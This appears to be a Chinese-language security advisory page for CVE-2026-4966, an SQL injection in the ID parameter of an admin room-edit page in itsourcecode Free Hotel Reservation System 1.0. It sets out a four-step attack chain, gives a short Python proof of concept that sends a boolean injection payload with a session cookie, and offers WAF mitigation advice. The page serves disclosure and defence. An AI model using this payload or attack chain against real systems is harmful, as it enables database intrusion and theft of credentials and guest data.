CVE-2026-4966 CVSS 6.3 中危

CVE-2026-4966 Free Hotel Reservation System SQL注入漏洞

披露日期: 2026-03-27

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-4966

漏洞类型

SQL注入

CVSS评分

6.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

itsourcecode Free Hotel Reservation System

漏洞概述

itsourcecode Free Hotel Reservation System 1.0版本存在安全漏洞。受影响的是/admin/mod_room/index.php?view=edit文件中的未知函数。由于对ID参数的处理不当，攻击者可以通过恶意操作该参数来执行SQL注入攻击。该漏洞可被远程利用，且需要低权限用户认证。成功利用该漏洞可能导致数据的机密性、完整性和可用性受到低程度影响。

技术细节

该漏洞的核心原理在于应用程序未能对用户输入的ID参数进行充分的过滤或验证，导致其直接被拼接到后端SQL查询语句中。在/admin/mod_room/index.php?view=edit接口处理编辑请求时，后端代码可能采用了不安全的字符串拼接方式（如直接将GET请求中的ID参数代入SQL语句）。攻击者利用这一缺陷，可以构造包含SQL元字符（如单引号、注释符--#、UNION操作符等）的恶意Payload。由于CVSS向量指标显示攻击需要低权限（PR:L），攻击者通常需要先登录系统获取有效的会话Cookie。一旦利用成功，攻击者可以绕过认证机制、读取数据库中的敏感信息（如管理员凭证、用户预订信息），或者在特定条件下修改数据库内容。

攻击链分析

STEP 1

侦察与信息收集

攻击者识别目标运行的是 itsourcecode Free Hotel Reservation System 1.0，并定位到 /admin/mod_room/index.php?view=edit 接口。

STEP 2

获取低权限凭证

由于漏洞需要低权限（PR:L），攻击者通过注册或弱口令猜测获取一个普通用户账号并登录系统。

STEP 3

构造并发起攻击

攻击者在浏览器或工具中修改请求参数，向ID参数注入恶意SQL代码（如UNION SELECT语句），发送至服务器。

STEP 4

执行与数据窃取

后端数据库执行恶意SQL语句，将敏感数据返回在HTTP响应中，或被攻击者用于进一步提权。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests

# Target URL
url = "http://target_ip/admin/mod_room/index.php?view=edit"

# Payload for SQL Injection (Example: Error-based or Boolean-based)
# Attempting to manipulate the 'ID' parameter
payload = {
    "ID": "1' AND 1=1-- -"  # Simple payload to test vulnerability
}

# Headers (Simulating an authenticated low-privilege user)
cookies = {
    "PHPSESSID": "valid_session_id_here"
}

try:
    response = requests.get(url, params=payload, cookies=cookies, timeout=10)
    if response.status_code == 200:
        print("[+] Request sent successfully.")
        print("[+] Check response content for database errors or data changes.")
        print(response.text[:500]) # Print first 500 chars for analysis
    else:
        print(f"[-] Request failed with status code: {response.status_code}")
except Exception as e:
    print(f"[-] An error occurred: {e}")

影响范围

itsourcecode Free Hotel Reservation System 1.0

防御指南

临时缓解措施

在官方修复补丁发布前，建议管理员通过Web应用防火墙（WAF）添加规则，拦截针对/admin/mod_room/index.php接口的包含SQL关键字（如UNION, SELECT, OR, AND）或特殊符号（如单引号）的请求。同时，加强对后台管理系统的访问控制审计，暂时限制非必要IP对管理后台的访问。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2026-4966
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2026-4966
3 Details https://www.cvedetails.com/cve/CVE-2026-4966/
4 VulDB https://vuldb.com/cve/CVE-2026-4966
5 Link https://github.com/bybinyu/Vulnerability-Practice/issues/8
6 Link https://itsourcecode.com/
7 Link https://vuldb.com/?ctiid.353843
8 Link https://vuldb.com/?id.353843
9 Link https://vuldb.com/?submit.777683

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表